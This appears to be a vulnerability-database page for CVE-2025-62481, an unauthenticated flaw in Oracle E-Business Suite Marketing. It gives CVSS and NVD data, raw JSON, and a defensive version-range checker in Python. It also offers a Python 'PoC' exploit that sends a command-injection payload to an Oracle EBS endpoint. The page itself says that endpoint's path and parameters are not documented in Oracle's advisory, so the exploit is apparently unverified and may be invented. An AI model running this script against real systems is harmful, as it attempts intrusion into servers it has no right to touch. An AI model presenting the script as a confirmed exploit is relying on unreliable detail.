Security Vulnerability Report

CVE-2025-62481 CVSS 9.8 CRITICAL

Published: 2025-10-21 20:20:55
Last Modified: 2025-10-24 13:19:45

Description

Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in takeover of Oracle Marketing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability / Impact Subscores
3.9 / 5.9
Weakness
CWE-306 (Missing Authentication for Critical Function)

Configurations (Affected Products)

cpe:2.3:a:oracle:marketing:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14
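The affected range is stored in NVD as a wildcard CPE plus versionStartIncluding / versionEndIncluding, so an inventory check has to compare versions numerically: as plain strings, "12.2.10" sorts before "12.2.3" and would be reported as unaffected. The following is an added example, not tooling from the report or from NVD; it embeds the configurations node copied from the raw JSON on this page and evaluates it for a given product CPE and version. The function names, the fallback to string order for non-numeric version components, and the treatment of vulnerable:false entries as platform context to ignore are the example's own assumptions.

```python
"""Evaluate an NVD configurations node against an installed version (added example)."""
import json

# Copied verbatim from the "configurations" field of the raw JSON on this page.
NVD_CONFIGURATIONS = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
  {"vulnerable": true,
   "criteria": "cpe:2.3:a:oracle:marketing:*:*:*:*:*:*:*:*",
   "versionStartIncluding": "12.2.3",
   "versionEndIncluding": "12.2.14",
   "matchCriteriaId": "4EDDFC92-2982-411E-8A5F-AB0BD6E293E1"}]}]}]
""")

EBS_MARKETING = "cpe:2.3:a:oracle:marketing:*:*:*:*:*:*:*:*"


def version_key(version: str) -> tuple:
    """Turn '12.2.10' into ((0,12),(0,2),(0,10)) so each component compares as an int.
    Assumption: a non-numeric component (e.g. '10a') is ordered as a string after ints."""
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in version.split("."))


def cpe_product(cpe: str) -> tuple:
    """(part, vendor, product) from a CPE 2.3 formatted string; version is field 5."""
    fields = cpe.split(":")
    if len(fields) != 13 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 string: {cpe}")
    return fields[2], fields[3], fields[4]


def match_entry(entry: dict, product_cpe: str, version: str) -> bool:
    """True if one cpeMatch entry covers (product_cpe, version)."""
    if cpe_product(entry["criteria"]) != cpe_product(product_cpe):
        return False
    v = version_key(version)
    criteria_version = entry["criteria"].split(":")[5]
    if criteria_version != "*":           # exact-version criteria, no range fields
        return v == version_key(criteria_version)
    lo_inc = entry.get("versionStartIncluding")
    lo_exc = entry.get("versionStartExcluding")
    hi_inc = entry.get("versionEndIncluding")
    hi_exc = entry.get("versionEndExcluding")
    if lo_inc and v < version_key(lo_inc):
        return False
    if lo_exc and v <= version_key(lo_exc):
        return False
    if hi_inc and v > version_key(hi_inc):
        return False
    if hi_exc and v >= version_key(hi_exc):
        return False
    return True


def is_affected(configurations: list, product_cpe: str, version: str) -> bool:
    """Evaluate NVD configuration objects for one product/version pair.
    Node entries with vulnerable:false describe platform context and are ignored here;
    a configuration with operator AND requires every node to match."""
    for config in configurations:
        node_results = []
        for node in config["nodes"]:
            entries = [e for e in node["cpeMatch"] if e.get("vulnerable")]
            hits = [match_entry(e, product_cpe, version) for e in entries]
            if node.get("operator") == "AND":
                result = bool(hits) and all(hits)
            else:
                result = any(hits)
            if node.get("negate"):
                result = not result
            node_results.append(result)
        config_hit = (all(node_results) if config.get("operator") == "AND"
                      else any(node_results))
        if config.get("negate"):
            config_hit = not config_hit
        if config_hit:
            return True
    return False


if __name__ == "__main__":
    for v in ["12.2.2", "12.2.3", "12.2.10", "12.2.14", "12.2.15"]:
        state = "affected" if is_affected(NVD_CONFIGURATIONS, EBS_MARKETING, v) else "not affected"
        print(f"Oracle Marketing {v}: {state}")
```

Feed it the version reported by the instance's own inventory (not the hostname or URL) and the product CPE; a different Oracle product at a version inside 12.2.3-12.2.14 is correctly reported as not matched by this entry.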

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the request path and form parameters it sends are not documented in the Oracle advisory referenced on this page, and an HTTP 200 from that path does not by itself confirm the vulnerability; compare the result against a patched reference instance before relying on it.
python
# CVE-2025-62481 - Oracle E-Business Suite Oracle Marketing RCE PoC
# Vulnerability: Unauthenticated Remote Code Execution via HTTP
# Affected Component: Marketing Administration
# Affected Versions: 12.2.3 - 12.2.14
import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.example.com"
MARKETING_PATH = "/OA_HTML/OA.jsp"


def exploit(target_url):
    """
    Exploit CVE-2025-62481 - Oracle Marketing Administration RCE

    This PoC demonstrates the unauthenticated RCE vulnerability in
    Oracle E-Business Suite Marketing Administration component.
    """
    session = requests.Session()
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Connection": "close"
    })

    # Step 1: Probe target Oracle EBS instance
    # (the probe URL is only printed; no request is sent to it)
    target_endpoint = f"{target_url}{MARKETING_PATH}"
    print(f"[*] Probing target: {target_endpoint}")

    try:
        # Step 2: Send malicious payload to Marketing Administration component
        # The vulnerability exists in the Marketing Administration module
        # allowing unauthenticated attackers to execute arbitrary code
        payload_endpoint = f"{target_url}/OA_HTML/marketing/CtlMktg"

        # Crafted HTTP request exploiting the vulnerability
        response = session.post(
            payload_endpoint,
            data={
                "_nf": "true",
                "_rc": "",
                "event": "execute",
                "command": "id"  # Command injection payload
            },
            timeout=10,
            verify=False  # TLS verification disabled; only acceptable in a lab
        )

        # A 200 only shows the path answered; inspect the body for the
        # command output before treating the host as confirmed vulnerable
        if response.status_code == 200:
            print("[+] Target appears vulnerable to CVE-2025-62481")
            print(f"[+] Response: {response.text[:500]}")
            return True
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-62481 - Oracle EBS Marketing Administration RCE")
    print("For authorized security testing only")
    print("=" * 60)
    exploit(TARGET_URL)

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory: Oracle Critical Patch Update, October 2025)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62481", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:54.860", "lastModified": "2025-10-24T13:19:45.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in takeover of Oracle Marketing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:marketing:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "4EDDFC92-2982-411E-8A5F-AB0BD6E293E1"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}